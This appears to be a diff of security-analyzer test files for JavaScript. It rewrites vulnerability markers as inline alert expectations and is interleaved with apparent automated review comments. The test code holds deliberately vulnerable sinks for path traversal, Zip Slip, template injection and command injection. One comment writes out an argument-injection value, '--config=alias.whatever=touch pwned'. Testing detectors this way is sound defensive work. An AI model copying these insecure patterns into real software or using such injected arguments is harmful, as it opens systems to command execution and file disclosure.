@@ -8,27 +8,26 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list let path2 = path; - path2 ||= res.write(fs.readFileSync(path2)); // GOOD: path is falsy + path2 ||= res.write(fs.readFileSync(path2)); // OK - path is falsy let path3 = path; - path3 &&= res.write(fs.readFileSync(path3)); // BAD: path is truthy + path3 &&= res.write(fs.readFileSync(path3)); // $ Alert - path is truthy let path4 = path; - path4 ??= res.write(fs.readFileSync(path4)); // GOOD - path is null or undefined - but we don't capture that. [INCONSISTENCY] + path4 ??= res.write(fs.readFileSync(path4)); // $ SPURIOUS: Alert - path is null or undefined - but we don't capture that. let path5 = path; path5 &&= "clean"; - res.write(fs.readFileSync(path5)); // GOOD: path is either falsy or "clean"; + res.write(fs.readFileSync(path5)); // OK - path is either falsy or "clean"; let path6 = path; path6 ||= "clean"; - res.write(fs.readFileSync(path6)); // BAD: path can still be tainted + res.write(fs.readFileSync(path6)); // $ Alert - path can still be tainted }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index 0146533c6dca..bf14b568196b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js 
@@ -50,6 +50,6 @@ function doZipSlip() { files.push(name); } for (const file of files) { - fs.createWriteStream(path.join(extractTo, file)); // OK + fs.createWriteStream(path.join(extractTo, file)); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js index 07918647e6f0..45e4ced8380b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js @@ -26,7 +26,7 @@ fs.createReadStream('archive.zip') } if (!fileName.startsWith(".")) { - entry.pipe(fs.createWriteStream(fileName)); // OK. + entry.pipe(fs.createWriteStream(fileName)); } }); @@ -35,5 +35,5 @@ fs.createReadStream('archive.zip') .on('entry', entry => { const fileName = path.normalize(entry.path); - entry.pipe(fs.createWriteStream(path.basename(fileName))); // OK. + entry.pipe(fs.createWriteStream(path.basename(fileName))); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/routes.js b/javascript/ql/test/query-tests/Security/CWE-073/routes.js index 2bfbad7cd37b..07e03fc0f404 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/routes.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/routes.js @@ -1,3 +1,3 @@ exports.foo = function(req, res) { - res.render('foo', req.body); // NOT OK + res.render('foo', req.body); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index ee2bff5f0e78..8b6c30c46947 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js 
@@ -7,26 +7,26 @@ app.post('/path', function(req, res) { var bodyParameter = req.body.bodyParameter; var queryParameter = req.query.queryParameter; - res.render('template', bodyParameter); // NOT OK - res.render('template', queryParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert + res.render('template', queryParameter); // $ Alert if (typeof bodyParameter === "string") { - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); } - res.render('template', queryParameter + ""); // OK + res.render('template', queryParameter + ""); - res.render('template', {profile: bodyParameter}); // OK + res.render('template', {profile: bodyParameter}); indirect(res, queryParameter); }); function indirect(res, obj) { - res.render("template", obj); // NOT OK + res.render("template", obj); // $ Alert const str = obj + ""; - res.render("template", str); // OK + res.render("template", str); - res.render("template", JSON.parse(str)); // NOT OK + res.render("template", JSON.parse(str)); // $ Alert } let routes = require('./routes'); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 6cb626fd7c1c..8f8b075010bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js 
@@ -4,27 +4,27 @@ app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app2 = require('express')(); app2.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app3 = require('express')(); app3.set('view engine', 'pug'); app3.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app5 = require('express')(); @@ -32,7 +32,7 @@ app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app6 = require('express')(); @@ -40,7 +40,7 @@ app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); const express = require('express'); 
@@ -49,6 +49,6 @@ var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 1cfea0118bc2..3f50d6d5df66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -6,7 +6,7 @@ const { exec } = require('child_process'); function echo_title() { // get the title from the event pull request const title = github.context.payload.pull_request.title; - exec(`echo ${title}`, (err, stdout, stderr) => { // NOT OK + exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; } @@ -16,7 +16,7 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { const head_ref = github.context.payload.pull_request.head.ref; - aexec.exec(`echo ${head_ref}`).then((res) => { // NOT OK + aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index abc9704a48e8..ddfa7b720d02 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js 
@@ -5,61 +5,61 @@ var cp = require("child_process"), var server = http.createServer(function(req, res) { let cmd = url.parse(req.url, true).query.path; - cp.exec("foo"); // OK - cp.execSync("foo"); // OK - cp.execFile("foo"); // OK - cp.execFileSync("foo"); // OK - cp.spawn("foo"); // OK - cp.spawnSync("foo"); // OK - cp.fork("foo"); // OK + cp.exec("foo"); + cp.execSync("foo"); + cp.execFile("foo"); + cp.execFileSync("foo"); + cp.spawn("foo"); + cp.spawnSync("foo"); + cp.fork("foo"); - cp.exec(cmd); // NOT OK - cp.execSync(cmd); // NOT OK - cp.execFile(cmd); // NOT OK - cp.execFileSync(cmd); // NOT OK - cp.spawn(cmd); // NOT OK - cp.spawnSync(cmd); // NOT OK - cp.fork(cmd); // NOT OK + cp.exec(cmd); // $ Alert + cp.execSync(cmd); // $ Alert + cp.execFile(cmd); // $ Alert + cp.execFileSync(cmd); // $ Alert + cp.spawn(cmd); // $ Alert + cp.spawnSync(cmd); // $ Alert + cp.fork(cmd); // $ Alert - cp.exec("foo" + cmd + "bar"); // NOT OK + cp.exec("foo" + cmd + "bar"); // $ Alert // These are technically NOT OK, but they are more likely as false positives - cp.exec("foo", {shell: cmd}); // OK - cp.exec("foo", {env: {PATH: cmd}}); // OK - cp.exec("foo", {cwd: cmd}); // OK - cp.exec("foo", {uid: cmd}); // OK - cp.exec("foo", {gid: cmd}); // OK + cp.exec("foo", {shell: cmd}); + cp.exec("foo", {env: {PATH: cmd}}); + cp.exec("foo", {cwd: cmd}); + cp.exec("foo", {uid: cmd}); + cp.exec("foo", {gid: cmd}); let sh, flag; if (process.platform == 'win32') sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // NOT OK + cp.spawn(sh, [ flag, cmd ]); // $ Alert let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert cp.execFile("/bin/bash", args); let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert run("sh", args); let args = []; args[0] = `-` + "c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert cp.execFile(`/bin` + "/bash", args); - cp.spawn('cmd.exe', ['/C', 
'foo'].concat(["bar", cmd])); // NOT OK - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // NOT OK + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // NOT OK - but no support for `[].push()` for indirect arguments [INCONSISTENCY] + cp.execFile(`/bin` + "/bash", args); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); @@ -72,7 +72,7 @@ var util = require("util") http.createServer(function(req, res) { let cmd = url.parse(req.url, true).query.path; - util.promisify(cp.exec)(cmd); // NOT OK + util.promisify(cp.exec)(cmd); // $ Alert }); @@ -80,7 +80,7 @@ const webpackDevServer = require('webpack-dev-server'); new webpackDevServer(compiler, { before: function (app) { app.use(function (req, res, next) { - cp.exec(req.query.fileName); // NOT OK + cp.exec(req.query.fileName); // $ Alert require("my-sub-lib").foo(req.query.fileName); // calls lib/subLib/index.js#foo }); @@ -91,5 +91,5 @@ import Router from "koa-router"; const router = new Router(); router.get("/ping/:host", async (ctx) => { - cp.exec("ping " + ctx.params.host); // NOT OK + cp.exec("ping " + ctx.params.host); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b5b8fc602bdf..b2cfe4424039 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,7 +12,7 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // BAD + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert } http.createServer(function (req, res) { 
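Review bot: The `$ MISSING: Alert` expectation on `cp.execFile(`/bin` + "/bash", args);` near the end of the first hunk sits on a call that passes `args`, not the `myArgs` array built with `push` that the comment describes, so the line does not exercise the case the comment documents. The `args[1] = cmd; // $ Alert` lines in the same hunk place the expectation on the taint-carrying assignment rather than on the sink, so if the push path is what is meant the call should presumably read `cp.execFile(`/bin` + "/bash", myArgs);` with `// $ MISSING: Alert - no support for `[].push()` for indirect arguments` moved to the `myArgs.push(cmd);` line; worth confirming against where the query actually reports. The three `let args = []` declarations in the same callback are a pre-existing redeclaration the commit keeps, acceptable only as long as the extractor tolerates it.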
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index ad91b66f5344..9d12f22bb249 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,7 +7,7 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // BAD + return cp.spawn(getShell(), ["-c", command], options) // $ Alert }; http.createServer(function (req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 25e45d675d9f..1cfc40856113 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js @@ -11,7 +11,7 @@ function asyncEach(arr, iterator) { } function execEach(commands) { - asyncEach(commands, (command) => exec(command)); // NOT OK + asyncEach(commands, (command) => exec(command)); // $ Alert }; require('http').createServer(function(req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 4b1dabde4412..0efc3279cf50 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js 
@@ -6,12 +6,12 @@ var app = express(); var exec = require("child_process").exec; app.post('/profile', upload.single('avatar'), function (req, res, next) { - exec("touch " + req.file.originalname); // NOT OK + exec("touch " + req.file.originalname); // $ Alert }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { req.files.forEach(file => { - exec("touch " + file.originalname); // NOT OK + exec("touch " + file.originalname); // $ Alert }) }); @@ -22,7 +22,7 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { - exec("touch " + filename); // NOT OK + exec("touch " + filename); // $ Alert }); req.pipe(busboy); }).listen(8000); @@ -33,12 +33,12 @@ app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); form.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); form2.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ Alert }); }); @@ -50,13 +50,13 @@ http.createServer(function (req, res) { var form = new multiparty.Form(); form.parse(req, function (err, fields, files) { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ Alert }); var form2 = new multiparty.Form(); form2.on('part', function (part) { // / file / field - exec("touch " + part.filename); // NOT OK + exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index 2e86ace433ce..a606c9166175 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js 
@@ -4,32 +4,32 @@ var http = require("http"), var server = http.createServer(function (req, res) { let cmd = url.parse(req.url, true).query.path; - require("cross-spawn").sync(cmd); // NOT OK - require("execa").shell(cmd); // NOT OK - require("execa").shellSync(cmd); // NOT OK - require("execa").stdout(cmd); // NOT OK - require("execa").stderr(cmd); // NOT OK - require("execa").sync(cmd); // NOT OK - - require("cross-spawn")(cmd); // NOT OK - require("cross-spawn-async")(cmd); // NOT OK - require("exec")(cmd); // NOT OK - require("exec-async")(cmd); // NOT OK - require("execa")(cmd); // NOT OK - require("remote-exec")(target, cmd); // NOT OK + require("cross-spawn").sync(cmd); // $ Alert + require("execa").shell(cmd); // $ Alert + require("execa").shellSync(cmd); // $ Alert + require("execa").stdout(cmd); // $ Alert + require("execa").stderr(cmd); // $ Alert + require("execa").sync(cmd); // $ Alert + + require("cross-spawn")(cmd); // $ Alert + require("cross-spawn-async")(cmd); // $ Alert + require("exec")(cmd); // $ Alert + require("exec-async")(cmd); // $ Alert + require("execa")(cmd); // $ Alert + require("remote-exec")(target, cmd); // $ Alert const ssh2 = require("ssh2"); - new ssh2().exec(cmd); // NOT OK - new ssh2.Client().exec(cmd); // NOT OK + new ssh2().exec(cmd); // $ Alert + new ssh2.Client().exec(cmd); // $ Alert const SSH2Stream = require("ssh2-streams").SSH2Stream; - new SSH2Stream().exec(false, cmd); // NOT OK + new SSH2Stream().exec(false, cmd); // $ Alert - require("execa").node(cmd); // NOT OK + require("execa").node(cmd); // $ Alert - require("foreground-child")(cmd); // NOT OK + require("foreground-child")(cmd); // $ Alert const opener = require("opener"); - opener("http://github.com/" + url.parse(req.url, true).query.user); // OK - opener("http://github.com", { command: cmd }); // NOT OK + opener("http://github.com/" + url.parse(req.url, true).query.user); + opener("http://github.com", { command: cmd }); // $ Alert }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 7a8f6982f178..74301997e38c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -1,14 +1,14 @@ import { exec } from "@actions/exec"; import { getInput } from "@actions/core"; -exec(process.env['TEST_DATA']); // NOT OK -exec(process.env['GITHUB_ACTION']); // OK +exec(process.env['TEST_DATA']); // $ Alert +exec(process.env['GITHUB_ACTION']); function test(e) { - exec(e['TEST_DATA']); // NOT OK - exec(e['GITHUB_ACTION']); // OK + exec(e['TEST_DATA']); // $ Alert + exec(e['GITHUB_ACTION']); } test(process.env); -exec(getInput('data')); // NOT OK +exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index 17b8b6c9c25e..fd1e9cdd9f97 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js 
@@ -1,36 +1,36 @@ var cp = require("child_process"); (function() { - cp.exec(process.argv); // NOT OK (just weird) - cp.exec(process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[1]); // OK - cp.exec("cmd.sh " + process.argv[2]); // NOT OK + cp.exec(process.argv); // $ Alert - just weird + cp.exec(process.argv[0]); + cp.exec("cmd.sh " + process.argv[0]); + cp.exec("cmd.sh " + process.argv[1]); + cp.exec("cmd.sh " + process.argv[2]); // $ Alert var args = process.argv.slice(2); - cp.execSync(args[0]); // NOT OK - cp.execSync("cmd.sh " + args[0]); // NOT OK + cp.execSync(args[0]); // $ Alert + cp.execSync("cmd.sh " + args[0]); // $ Alert var fewerArgs = args.slice(1); - cp.execSync(fewerArgs[0]); // NOT OK - cp.execSync("cmd.sh " + fewerArgs[0]); // NOT OK + cp.execSync(fewerArgs[0]); // $ Alert + cp.execSync("cmd.sh " + fewerArgs[0]); // $ Alert var arg0 = fewerArgs[0]; - cp.execSync(arg0); // NOT OK - cp.execSync("cmd.sh " + arg0); // NOT OK + cp.execSync(arg0); // $ Alert + cp.execSync("cmd.sh " + arg0); // $ Alert }); (function() { const args = process.argv.slice(2); const script = path.join(packageDir, 'app', 'index.js'); - cp.execSync(`node ${script} ${args[0]} --option"`); // NOT OK - cp.execSync(`node ${script} ${args.join(' ')} --option"`); // NOT OK + cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert + cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert }); -cp.exec("cmd.sh " + require("get-them-args")().foo); // NOT OK +cp.exec("cmd.sh " + require("get-them-args")().foo); // $ Alert cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided. -cp.exec("cmd.sh " + require("yargs").argv.foo); // NOT OK -cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK +cp.exec("cmd.sh " + require("yargs").argv.foo); // $ Alert +cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var args = require('yargs') // eslint-disable-line 
@@ -38,9 +38,9 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK .option('verbose', { foo: "bar" }) .argv - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert - cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // NOT OK + cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // $ Alert }); (function () { @@ -52,7 +52,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK .usage('Usage: foo bar') .command(); - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert var tainted1 = require('yargs').argv; var tainted2 = require('yargs').parse() 
@@ -62,34 +62,34 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK taint2: tainted2 } - cp.exec("cmd.sh " + taint1rest); // NOT OK - has flow from tainted1 - cp.exec("cmd.sh " + taint2rest); // NOT OK - has flow from tianted2 + cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 + cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 var {...taint3} = require('yargs').argv; - cp.exec("cmd.sh " + taint3); // NOT OK + cp.exec("cmd.sh " + taint3); // $ Alert var [...taint4] = require('yargs').argv; - cp.exec("cmd.sh " + taint4); // NOT OK + cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { const argv = process.argv.slice(2); var minimist = require("minimist"); - cp.exec("cmd.sh " + minimist(argv).foo); // NOT OK + cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert var subarg = require('subarg'); - cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // $ Alert var yargsParser = require('yargs-parser'); - cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' var flags = args.parse(process.argv); - cp.exec("cmd.sh " + flags.foo); // NOT OK + cp.exec("cmd.sh " + flags.foo); // $ Alert var flags = require('arg')({...spec}); - cp.exec("cmd.sh " + flags.foo); // NOT OK + cp.exec("cmd.sh " + flags.foo); // $ Alert }) (function () { @@ -99,13 +99,13 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK parser.add_argument('-f', '--foo', { help: 'foo bar' }); - cp.exec("cmd.sh " + parser.parse_args().foo); // NOT OK + cp.exec("cmd.sh " + parser.parse_args().foo); // $ Alert }); (function () { const commandLineArgs = require('command-line-args'); const options = commandLineArgs(optionDefinitions); - cp.exec("cmd.sh " + options.foo); // NOT OK + cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { 
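Review bot: The rewritten line `cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2` carries the misspelling over from the removed line; since the commit touches it anyway, `// $ Alert - has flow from tainted2` would match the `tainted2` variable declared in the preceding hunk. The enclosing function expression starts outside this hunk.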
@@ -113,7 +113,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const cli = meow(`helpstring`, {flags: {...flags}}); - cp.exec("cmd.sh " + cli.input[0]); // NOT OK + cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); (function () { @@ -121,20 +121,20 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK var opts = dashdash.parse({options: options}); - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); var opts = parser.parse(); - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { const { program } = require('commander'); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert }); (function () { @@ -142,8 +142,8 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const program = new Command(); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert - cp.execFile(program.opts().pizzaType, ["foo", "bar"]); // OK + cp.execFile(program.opts().pizzaType, ["foo", "bar"]); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index f68093d24053..16ace6a020f6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js 
@@ -4,18 +4,18 @@ const { execFile } = require("child_process"); app.get("/", (req, res) => { const remote = req.query.remote; - execFile("git", ["ls-remote", remote]); // NOT OK + execFile("git", ["ls-remote", remote]); // $ Alert - execFile("git", ["fetch", remote]); // NOT OK + execFile("git", ["fetch", remote]); // $ Alert - indirect("git", ["ls-remote", remote]); // NOT OK + indirect("git", ["ls-remote", remote]); // $ Alert const myArgs = req.query.args; - execFile("git", myArgs); // NOT OK + execFile("git", myArgs); // $ Alert if (remote.startsWith("--")) { - execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. + execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. } else { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's not an option } @@ -23,10 +23,10 @@ app.get("/", (req, res) => { if (remote.startsWith("git@")) { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's a git URL } else { - execFile("git", ["ls-remote", remote, "HEAD"]); // NOT OK - unknown starting string + execFile("git", ["ls-remote", remote, "HEAD"]); // $ Alert - unknown starting string } - execFile("git", req.query.args); // NOT OK - unknown args + execFile("git", req.query.args); // $ Alert - unknown args execFile("git", ["add", req.query.args]); // OK - git add is not a command that can be used to execute arbitrary code 
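Review bot: The re-emitted line `execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here.` in the first hunk keeps a garbled comment; as the commit already rewrites the line, `// OK - it is very explicit that options are allowed here` reads correctly. The enclosing `app.get` handler begins in the hunk header context and continues past this hunk.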
@@ -34,16 +34,16 @@ app.get("/", (req, res) => { execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat. - execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // OK + execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // hg - execFile("hg", ["clone", req.query.remote]); // NOT OK + execFile("hg", ["clone", req.query.remote]); // $ Alert - execFile("hg", ["whatever", req.query.remote]); // NOT OK - `--config=alias.whatever=touch pwned` + execFile("hg", ["whatever", req.query.remote]); // $ Alert - `--config=alias.whatever=touch pwned` - execFile("hg", req.query.args); // NOT OK - unknown args + execFile("hg", req.query.args); // $ Alert - unknown args - execFile("hg", ["clone", "--", req.query.remote]); // OK + execFile("hg", ["clone", "--", req.query.remote]); }); function indirect(cmd, args) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js index 0d610b1e9dd3..0a0edcbd25c7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js 
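Review bot: The context line `execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat.` at the top of the hunk still uses the old `NOT OK … [INCONSISTENCY]` marker that the rest of the commit replaces (the equivalent case in child_process-test.js becomes `$ MISSING: Alert`). Under the new inline-expectation scheme it would presumably read `// $ MISSING: Alert - hard to track through concat`, which records the known gap in the test's expectations rather than in free text. The enclosing `app.get` handler starts outside the hunk, and `indirect` at the hunk's end is cut off.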
